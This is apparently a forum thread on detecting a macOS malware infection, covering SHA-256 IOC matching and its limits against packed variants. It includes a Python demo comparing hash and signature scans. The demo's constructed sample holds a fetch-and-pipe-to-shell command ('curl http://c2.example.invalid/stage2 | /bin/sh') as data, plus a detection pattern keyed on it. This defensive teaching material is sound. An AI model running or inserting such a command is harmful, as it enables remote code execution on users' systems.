
Is there any diagnostic tool out there to determine if you've been infected?



I whipped up https://gist.github.com/atdt/e84483c70c078a72f5e08ead365c69f... based on the information in the report.


> Is there any diagnostic tool out there to determine if you've been infected?

From what I can tell, they posted the SHA256 of the offending binary under the IOCs section of that web page. So you should be able to do this in the root of your home directory to detect if such a file exists:

# find . -type f -print0 | xargs -0 shasum -a 256 | grep 664e0a048f61a76145b55d1f1a5714606953d69edccec5228017eb546049dc8c


Binary checksums are usually not very helpful for identifying malware. The fact that the binary they were looking at was called "unpacked" suggests that there would be packed versions out there, and they would have a different checksum.


Yes. And the malware could be polymorphic. Or there could be multiple versions of the same "core" out there. It's not clear to me how sophisticated virus (malware) scanners for OS X are with dealing with that.


From what I know (which is not much) scanners, among other things, search for identifying patterns in files. So there is an identifying pattern of each discovered malware/virus in a database.
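An added example, not code from the thread or from the report it discusses, that puts the two points above side by side: the exact-hash check suggested earlier in the thread, and the objection that a repacked or otherwise altered build defeats it while a pattern-based signature of the kind scanners keep in their databases still fires. The SHA-256 is the one quoted in the thread; the sample files, the "variant", and the byte signature are all constructed here for illustration and are hypothetical.

```python
"""Hash-IOC scan versus byte-pattern scan over a constructed sample tree."""
import hashlib
import re
import tempfile
from pathlib import Path

# SHA-256 quoted in the thread as the report's IOC. The files built below are
# constructed stand-ins, so this digest will not match any of them.
REPORT_SHA256 = "664e0a048f61a76145b55d1f1a5714606953d69edccec5228017eb546049dc8c"

# Constructed stand-in for the "unpacked" sample (hypothetical content).
SAMPLE_CORE = (
    b"CONSTRUCTED_SAMPLE_CORE: curl http://c2.example.invalid/stage2 | /bin/sh\n"
    + b"\x00" * 64
)

# Hypothetical byte signature for the core, in the spirit of a scanner's
# pattern database: it keys on the loader command, not on the whole file.
SIGNATURE = re.compile(rb"CONSTRUCTED_SAMPLE_CORE: curl http://[^\s|]+/stage2")


def sha256_file(path: Path, chunk_size: int = 1 << 16) -> str:
    """Stream a file through SHA-256 (same digest `shasum -a 256` prints)."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root: Path, ioc_hashes: set, signature: re.Pattern) -> dict:
    """Walk `root`; report files hit by exact-hash IOC and by byte signature."""
    hits = {"hash": [], "pattern": []}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if sha256_file(path) in ioc_hashes:
            hits["hash"].append(path.name)
        # Whole-file read is fine for a demo; a real scanner would bound this.
        if signature.search(path.read_bytes()):
            hits["pattern"].append(path.name)
    return hits


def build_sample_tree(root: Path) -> None:
    """Create three constructed files: the core, an altered variant, a benign file."""
    (root / "unpacked").write_bytes(SAMPLE_CORE)
    # Variant: same core behind a different stub and padding, a stand-in for a
    # rebuilt or "polymorphic" drop whose functional bytes are unchanged.
    altered = SAMPLE_CORE.replace(b"\x00" * 64, b"\xff" * 64)
    (root / "variant").write_bytes(b"STUB-v2\x00" + altered)
    (root / "notes.txt").write_bytes(b"nothing to see here\n")


def run_demo() -> dict:
    """Build the tree, then scan it with both techniques and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        # IOC set: the report's hash plus the hash of our constructed core.
        iocs = {REPORT_SHA256, sha256_file(root / "unpacked")}
        return scan_tree(root, iocs, SIGNATURE)


if __name__ == "__main__":
    print(run_demo())
```

Running it, the hash check flags only `unpacked`, while the signature flags both `unpacked` and `variant`. The caveat that applies in practice: a real packer compresses or encrypts the core, so a static byte pattern like this one only helps once the sample has been unpacked (on disk or in memory); the example models the weaker case where an attacker rebuilds the drop but leaves the functional bytes intact.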


I assume this has been added to Kaspersky's anti-virus suite considering it is their blog post.


Apple keeps Gatekeeper and another process up to date; effectively, scanning for this kind of stuff is built into the OS.



